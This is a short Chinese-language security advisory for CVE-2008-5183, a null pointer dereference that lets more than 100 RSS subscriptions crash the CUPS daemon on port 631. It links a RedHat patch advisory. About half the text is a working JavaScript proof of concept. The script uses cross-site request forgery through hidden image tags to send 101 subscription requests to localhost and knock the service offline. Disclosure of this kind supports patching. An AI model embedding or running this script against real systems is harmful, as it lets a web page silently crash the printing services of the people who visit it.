BUGTRAQ ID: 32419
CVE(CAN) ID: CVE-2008-5183
Common Unix Printing System(CUPS)是一款通用Unix打印系统,是Unix环境下的跨平台打印解决方案,基于Internet打印协议,提供大多数PostScript和raster打印机服务。
如果向默认监听于631/tcp端口的CUPS守护程序(/usr/sbin/cupsd)添加了多于100个RSS订阅的话,就会触发空指针引用,导致守护程序崩溃。
RedHat已经为此发布了一个安全公告(RHSA-2008:1029-01)以及相应补丁:
RHSA-2008:1029-01:Moderate: cups security update
链接:<a href=“https://www.redhat.com/support/errata/RHSA-2008-1029.html” target=“_blank”>https://www.redhat.com/support/errata/RHSA-2008-1029.html</a>
<script>
// make 101 CSRFed requests to CUPS daemon via &apos;img&apos; tags
// causes CUPS daemon to crash
// by Adrian &apos;pagvac&apos; Pastor | GNUCITIZEN.org
for(var i=1;i<=101;++i) {
document.write("<img width=0 height=0 " +
"src=\"http://localhost:631/admin/?OP=add-rss-subscription&SUBSCRIPTION_NAME=DOS_TEST_" +
i + "&PRINTER_URI=%23ALL%23&EVENT_JOB_CREATED=on&MAX_EVENTS=20\">");
}
</script>